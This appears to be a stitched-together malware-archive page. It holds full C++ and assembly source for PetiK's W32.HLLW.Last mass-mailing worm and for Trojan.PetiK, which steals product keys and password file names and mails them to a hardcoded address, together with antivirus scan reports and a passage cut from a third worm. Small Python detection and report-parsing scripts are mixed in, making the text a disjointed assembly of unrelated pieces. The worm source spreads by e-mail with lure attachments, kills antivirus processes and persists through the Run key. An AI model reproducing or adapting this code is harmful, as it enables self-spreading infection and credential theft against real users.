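_EVENT_RE = re.compile(r"^\s*on\s+[^:\s]+:(?P<event>[A-Za-z]+):", re.IGNORECASE)
# "/.dcc" is the silent form of "/dcc"; the worm sends to $nick, the joining user.
_DCC_RE = re.compile(r"/\.?dcc\s+send\s+\$nick\s+(?P<path>\S+)", re.IGNORECASE)


def script_lines(ini_text: str) -> List[str]:
    """Return the n0..nN code lines of the [script] section in numeric order."""
    numbered: Dict[int, str] = {}
    in_script = False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        if not in_script or "=" not in line:
            continue
        key, code = line.split("=", 1)
        if key.startswith("n") and key[1:].isdigit():
            numbered[int(key[1:])] = code
    return [numbered[k] for k in sorted(numbered)]


def find_autosend_hooks(ini_text: str) -> List[dict]:
    """Return one {'event', 'sends'} entry per event handler that DCC-sends a file."""
    hooks: List[dict] = []
    current = None  # handler whose braces are currently open
    depth = 0
    for code in script_lines(ini_text):
        opened = _EVENT_RE.match(code)
        if opened and current is None:
            current = {"event": opened.group("event").upper(), "sends": []}
            depth = 0
        if current is None:
            continue
        depth += code.count("{") - code.count("}")
        current["sends"].extend(m.group("path") for m in _DCC_RE.finditer(code))
        if depth <= 0:  # closing brace of the handler reached
            if current["sends"]:
                hooks.append(current)
            current = None
    return hooks


if __name__ == "__main__":
    for name, text in (("worm", WORM_SCRIPT_INI), ("benign", BENIGN_SCRIPT_INI)):
        print(name, find_autosend_hooks(text))
```

Run it over each of the four script.ini locations listed in the description to confirm whether the hook is present.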
File Anthrax.exe received on 05.16.2009 10:44:20 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.worm.6144
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!156f
Avast 4.8.1335.0 2009.05.15 Win32:AntraxInfo
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SIg.638D8F0A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.1
Comodo 1157 2009.05.08 Worm.Win32.Petik.T
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6144.B
F-Prot 4.4.4.56 2009.05.15 W32/Malware!156f
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick@mm
GData 19 2009.05.16 Generic.Malware.SIg.638D8F0A
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!0C6CD035D3C5
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.1
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick@mm
NOD32 4080 2009.05.15 Win32/Petik.T
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6144.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6144.B
Panda 10.0.0.14 2009.05.15 W32/Petik
PCTools 4.4.2.0 2009.05.15 I-Worm.Petik.L
Prevx 3.0 2009.05.16 High Risk Cloaked Malware
Rising 21.29.51.00 2009.05.16 Worm.Anthrax
Sophos 4.41.0 2009.05.16 W32/Petick-A
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.S
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Anthrax
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.6144
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petik.L

Additional information
File size: 6144 bytes
MD5...: 0c6cd035d3c5b84b13d1f54d70bf5fb3
SHA1..: 80bd3e0ec9c6ab27997d7e55d4b0094ebeea26c9
SHA256: 36ee4e185c6b791ae8d38118bd0e00ae3c2135c1bfcd7f3452165a18c96283dc
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name of worm : W32.HLLW.Last
Author : PetiK
Size : 28672 bytes
Date : 10/12/2001

Comment : My very first (and last) worm coded in C++ (compiled with Borland).

Why this name ? I decided to stop coding worms and viruses. During one year I
learnt many things about worms and viruses and I thank all the people who helped
me.

*/

#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argsused // do not generate a compilation listing file
char filename[100];
char windir[100], windr[100];
HKEY hReg;
FILE *htm;
HANDLE infhtm,lSnapshot,myproc;
HWND NAVh;
BOOL rProcessFound;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

LHANDLE session;
MapiMessage *mess;
HINSTANCE hMAPI;
char messId[512],mname[50],maddr[30];
unsigned long count=0;
BYTE done[50];
DWORD siz=sizeof(done);
DWORD type=REG_SZ;
LPSTR Persona=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";

SYSTEMTIME syst;
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA ffile;

char *sujet[]={
"New Game for You.",
"Protect your computer against VBS/Worm and VBS/Virus",
"Free Flash Application !",
"Internet Explorer 5.0/6.0 Patch",
"Try WinXP.",
"Free Chat",
};

char *corps[]={
"Hi,\n\nTake a look at this new game found on the web.",
"This tool allows you to protect your computer against the VBS worm/virus.",
"Hi,\n\nVery good application make with Flash 5.",
"There is the last patch for Internet Explorer against the ActiveX's bugs.",
"Run this small program to see a demo of Win XP.",
"Hello,\n\nVery cool program to chat on the net.",
};

char *attachfile[]={
"New_Game.exe",
"Fix_VBSWormVirus.exe",
"Flash_EXE.exe",
"IEPatch.exe",
"Demo_WinXP.exe",
"FreeChat.exe",
};

char *text[]={
"This file is not a Win32 file valid",
"Cannot Open files : It does not appear to be a valid Win32\n\nIf you downloaded the file, try downloading again.",
"Error with Kernel32 :\nThis program will be terminated.",
"Loader Error :\nThis program will be terminated."
};

void Welcome();
void FuckAntivirus();
void htmfile();
void Spread();

ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);


ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}

GetModuleFileName(hInst,filename,100);
GetWindowsDirectory((char *)windir,100);
strcpy(windr,windir);
strcat(windir,"\\MSKERN32.EXE");
if ((lstrcmp(filename,windir))!=0) {
Welcome();
}
strcat(windr,"\\MSKern32.exe");
CopyFile(filename,windr,0);

RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"MS Kernel32",0,REG_SZ, (BYTE *)windr, 100);
RegCloseKey(hReg);

FuckAntivirus();

GetSystemTime(&syst);
if(syst.wDay==1 && syst.wMonth==12) {
CreateDirectory("C:\\PetiK_Dir",0);
SetCurrentDirectory("C:\\PetiK_Dir");
htm = fopen("petikvx.htm","w");
fprintf(htm,"<html><head><title>The Last From PetiK</title></head>\n");
fprintf(htm,"<body bgcolor=\"blue\" text=\"yellow\">\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">Win32.HLLW.Last is in your computer\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">This my last worm\n");
fprintf(htm,"<p align=\"center\"><font size=\"3\">Greetz to : all3gro, Benny, Bumblebee, ");
fprintf(htm,"Mandragore, ZeMacroKiller98, the 29A group and the [MATRiX] group.\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">GOOD BYE\n");
fprintf(htm,"</font></p>\n");
fprintf(htm,"</body></html>");
fclose(htm);
ShellExecute(0,"open","petikvx.htm",0,0,SW_SHOWNORMAL);
Sleep(3000);
MessageBox(NULL,"My last worm.\nCoded by PetiK (c)2001","W32.HLLW.Last", MB_OK|MB_ICONINFORMATION);
}
htmfile();

Sleep(30000);

Spread();
return 0;
}

void Welcome()
{
MessageBeep(MB_ICONHAND);
MessageBox(NULL, text[GetTickCount()&3], filename, MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
}

void FuckAntivirus()
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}

void htmfile()
{
register bool abc=TRUE;
register HANDLE hFile;
register HWND verif;
RegOpenKeyEx(HKEY_USERS,Persona,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Personal",0,&type,done,&siz);
RegCloseKey(hReg);
SetCurrentDirectory(done);
hFile=FindFirstFile("*.ht*",&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("HTM,HTML Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt");
abc=FindNextFile(hFile,&ffile);
}
}
FindClose(hFile);
abc=TRUE;
hFile=FindFirstFile("*.doc",&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("DOC Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt");
abc=FindNextFile(hFile,&ffile);
}
}
SetFileAttributes("C:\\liste.txt",FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN);
}

void Spread()
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
count=(unsigned long)(syst.wMilliseconds*syst.wMinute);
while(count>5)
count=(unsigned long)(count/2);
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject=sujet[count];
mess->lpszNoteText=corps[count];
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attachfile[count];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
count++;
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mess->lpFiles);
mFreeBuffer(mess);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
File Last.exe received on 05.16.2009 17:43:12 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Stopin!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Stopin.worm.28672
AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.B
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Stopin
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 Win32:Matrix-GoodY
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.T
BitDefender 7.2 2009.05.16 I-Worm.Stopin.B
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.b
ClamAV 0.94.1 2009.05.16 Worm.Stopin.B
Comodo 1157 2009.05.08 Worm.Win32.Stopin.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Petik.59932
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.b
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.28672.A
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.b
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.B@mm
GData 19 2009.05.16 I-Worm.Stopin.B
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Stopin
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Stopin.b
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.b
McAfee 5616 2009.05.15 W32/Stopin.a@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.a@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.B
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.AI@mm
NOD32 4080 2009.05.15 Win32/Stopin.A
Norman 6.01.05 2009.05.16 W32/Stopin.B@mm
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Stopin.28672
Panda 10.0.0.14 2009.05.16 W32/HLLW.Last
PCTools 4.4.2.0 2009.05.16 I-Worm.Petlast.A
Prevx 3.0 2009.05.16 High Risk Worm
Rising 21.29.52.00 2009.05.16 Worm.Mail.Stopin.a
Sophos 4.41.0 2009.05.16 W32/Stall-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.b
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.b
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETTICK.Z
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Last
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin.B
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petlast.A

Additional information
File size: 28672 bytes
MD5...: bfce6a179fa853c4c0a5bffc6b8c8f72
SHA1..: 6c8f1623c5471d556003928c15bf670175fc4d3d
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name : Trojan.PetiK
Author : PetiK
Language : C++/ASM
Start : December 12th 2001
End : December 29th 2001

Modifications : January 13th 2002

*/

#include <windows.h>
#include <tlhelp32.h>
#include <mapi.h>
#pragma argsused
#pragma inline
// Install Trojan
char filename[100], sysdir[100], sysdr[100], liste[50], pwl[50];
HKEY hReg;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

// Fuck antivirus
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
// Gather information
BYTE owner[100],org[100],key[30],id[30],ver[30];
BYTE page[150];
DWORD sizowner=sizeof(owner),sizorg=sizeof(org),sizkey=sizeof(key),sizid=sizeof(id);
DWORD sizver=sizeof(ver),sizpage=sizeof(page),type=REG_SZ;
LPSTR CurVer="Software\\Microsoft\\Windows\\CurrentVersion",Main="Software\\Microsoft\\Internet Explorer\\Main";
// Send the information

PROCESSENTRY32 uProcess;
WIN32_FIND_DATA Search;

void Bienvenue();
void StopDetect();
void Information();
void SendInfo();

ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}

// Install trojan
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdir,"\\SETUP02.EXE");
if ((lstrcmp(filename,sysdir))!=0) {
Bienvenue();
}
else
{
SendInfo();
}
strcat(sysdr,"\\Setup02.exe");
CopyFile(filename,sysdr,0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft Setup",0,REG_SZ, (BYTE *)sysdr, 100);
RegCloseKey(hReg);
StopDetect();
Information();
return 0;
}

void StopDetect()
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void Information()
{
register bool abc=TRUE;
register HANDLE hFile;
GetSystemDirectory((char *)liste,50);
strcat(liste,"\\liste_troj.txt");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,CurVer,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"RegisteredOwner",0,&type,owner,&sizowner);
RegQueryValueEx(hReg,"RegisteredOrganization",0,&type,org,&sizorg);
RegQueryValueEx(hReg,"ProductKey",0,&type,key,&sizkey);
RegQueryValueEx(hReg,"ProductId",0,&type,id,&sizid);
RegQueryValueEx(hReg,"Version",0,&type,ver,&sizver);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_CURRENT_USER,Main,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Start Page",0,&type,page,&sizpage);
RegCloseKey(hReg);
WritePrivateProfileString("Info Ordi","Owner",owner,liste);
WritePrivateProfileString("Info Ordi","Organization",org,liste);
WritePrivateProfileString("Info Ordi","ProductKey",key,liste);
WritePrivateProfileString("Info Ordi","ProductId",id,liste);
WritePrivateProfileString("Info Ordi","Version",ver,liste);
WritePrivateProfileString("Info Internet","Page Internet",page,liste);
GetWindowsDirectory((char *)pwl,50);
SetCurrentDirectory(pwl);
hFile=FindFirstFile("*.pwl",&Search);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("Info Pass",Search.cFileName,pwl,liste);
abc=FindNextFile(hFile,&Search);
}
}
FindClose(hFile);
}

void SendInfo()
{
_asm
{
DebutAsm:
push 50
push offset liste
call GetSystemDirectoryA
call @liste
db "\liste_troj.txt",0
@liste: push offset liste
call lstrcat
call @wininetdll
db "WININET.DLL",0
@wininetdll:
call LoadLibrary
test eax,eax
jz send
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz End
mov edi,eax
verif: push 00h
push offset Tmp
call edi
dec eax
jnz verif
push ebp
call FreeLibrary

send: call @mapidll
db "MAPI32.DLL",0
@mapidll:
call LoadLibrary
test eax,eax
jz End
mov ebp,eax
call @sendmail
db "MAPISendMail",0
@sendmail:
push ebp
call GetProcAddress
test eax,eax
jz End
mov edi,eax

xor eax,eax
push eax
push eax
push offset Message
push eax
push [MsgHdl]
call edi

push 5000
call Sleep

push ebp
call FreeLibrary

End: jmp FinAsm

liste db 50 dup (0)
Tmp dd 0
MsgHdl dd 0
petikmail db "Pentasm99@aol.com",0
subject db "Trojan_PetiK, OUVRE-VITE PETIK",0
body db "Encors un con ki s'est fait prendre",0dh,0ah
db "Tant pis pour lui. Je peux tout voir.",0dh,0ah,0dh,0ah,0dh,0ah
db 9,9,"PetiKVX (www.petikvx.fr.fm)",0

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset petikmail
dd offset petikmail
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset liste
dd ?
dd ?
FinAsm:
}
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"Microsoft Setup");
RegCloseKey(hReg);
}

void Bienvenue()
{
MessageBox(NULL,"Je te souhaite une Bonne et Heureuse Nouvelle Année.\nEt tous mes meilleurs voeux.",
"BONNE ANNEE !",MB_OK|MB_ICONINFORMATION);
}
File Trojan_PetiK.exe received on 05.16.2009 20:10:19 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 PSW.Generic.HIF
BitDefender 7.2 2009.05.16 Trojan.PWS.Petilam.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Trojan.PWS.Petilam
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.16 Trojan-PSW.Win32.Petilam
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 Trojan.PWS.Petilam.A
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Trojan-PSW.Win32.Petilam
McAfee 5616 2009.05.15 -
McAfee+Artemis 5616 2009.05.15 -
McAfee-GW-Edition 6.7.6 2009.05.15 -
Microsoft 1.4602 2009.05.16 PWS:Win32/Petilam
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Suspicious file
PCTools 4.4.2.0 2009.05.16 Trojan.PWS.Petilam.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Trojan.Spy.Win32.Undef.GEN
Rising 21.29.52.00 2009.05.16 [Suspicious]
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 TROJ_PETILAM.A
VBA32 3.12.10.5 2009.05.16 Win32.PSW.Petilam
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 Trojan.PWS.Petilam.A

Additional information
File size: 24064 bytes
MD5...: c12a8711efbf38f0820c827f22269684
SHA1..: 2afd3a9fb4ae7af97c9618b98b87b28894fec2d2
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
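The scan reports on this page are flattened "Antivirus Version Last Update Result" tables, and a long result can wrap onto a line of its own (as Prevx's does above). As an added example, not part of the archive, the following Python parses one report into structured rows, folds a wrapped result back into its engine, and summarises coverage; the sample text is a constructed excerpt of the Trojan_PetiK.exe report.

```python
"""Parse the flat "Antivirus Version Last Update Result" scan reports on this page."""
import re
from typing import Dict, List, NamedTuple, Tuple


class ScanRow(NamedTuple):
    vendor: str
    version: str
    updated: str
    result: str  # "-" means this engine did not flag the file


# Constructed excerpt in the page's layout; the rows are taken from the
# Trojan_PetiK.exe report above, including Prevx's wrapped second result line.
SAMPLE_REPORT = """File Trojan_PetiK.exe received on 05.16.2009 20:10:19 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 -
AVG 8.5.0.336 2009.05.15 PSW.Generic.HIF
BitDefender 7.2 2009.05.16 Trojan.PWS.Petilam.A
Kaspersky 7.0.0.125 2009.05.16 Trojan-PSW.Win32.Petilam
McAfee 5616 2009.05.15 -
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Prevx 3.0 2009.05.16 Medium Risk Malware
Trojan.Spy.Win32.Undef.GEN
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
TrendMicro 8.950.0.1092 2009.05.15 TROJ_PETILAM.A

Additional information
File size: 24064 bytes
MD5...: c12a8711efbf38f0820c827f22269684
"""

_HEADER_RE = re.compile(r"^File (?P<name>\S+) received on (?P<when>.+)$")
# Vendor and version never contain spaces in this layout; the result may.
_ROW_RE = re.compile(
    r"^(?P<vendor>\S+)\s+(?P<version>\S+)\s+(?P<updated>\d{4}\.\d{2}\.\d{2})\s+(?P<result>.+)$"
)
_INFO_RE = re.compile(r"^(?P<key>File size|MD5|SHA1|SHA256)[.: ]+(?P<value>.+)$")


def parse_report(text: str) -> Dict[str, object]:
    """Return {'file', 'received', 'rows': [ScanRow, ...], 'info': {...}} for one report."""
    rows: List[ScanRow] = []
    info: Dict[str, str] = {}
    report: Dict[str, object] = {"file": None, "received": None, "rows": rows, "info": info}
    in_table = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = _HEADER_RE.match(line)
        if header:
            report["file"], report["received"] = header.group("name"), header.group("when")
            continue
        if line.startswith("Antivirus Version"):
            in_table = True
            continue
        if line == "Additional information":
            in_table = False
            continue
        if in_table:
            row = _ROW_RE.match(line)
            if row:
                rows.append(ScanRow(**row.groupdict()))
            elif rows:
                # A result wrapped onto its own line belongs to the previous engine.
                rows[-1] = rows[-1]._replace(result=rows[-1].result + " / " + line)
            continue
        meta = _INFO_RE.match(line)
        if meta:
            info[meta.group("key")] = meta.group("value").strip()
    return report


def detection_rate(report: Dict[str, object]) -> Tuple[int, int]:
    """(engines that flagged the file, engines that scanned it)."""
    rows: List[ScanRow] = report["rows"]
    return sum(1 for r in rows if r.result != "-"), len(rows)


def undetected(report: Dict[str, object]) -> List[str]:
    """Vendors that reported no detection."""
    return [r.vendor for r in report["rows"] if r.result == "-"]


def vendors_naming(report: Dict[str, object], family: str) -> List[str]:
    """Vendors whose detection name contains the family token (case-insensitive)."""
    return [r.vendor for r in report["rows"] if family.lower() in r.result.lower()]


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    print(parsed["file"], detection_rate(parsed), undetected(parsed))
```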
/*
Name : I-Worm.SingLung
Author : PetiK
Date : January 23rd 2002
Language : C++/Win32asm

Terminates some processes such as antivirus programs.
Copies itself to %SYSDIR%\MSGDI32.EXE
Waits for an Internet connection
Scans some HTML files to find e-mail addresses and spreads with MAPI functions.

Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);

*/

#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argsused
#pragma inline

char filename[100],sysdir[100],sysdr[100],winhtm[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
int i;
HANDLE fd,lSnapshot,myproc;
BOOL rProcessFound;
FILE *vbs;
BYTE desktop[50],favoris[50],personal[50],cache[50];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
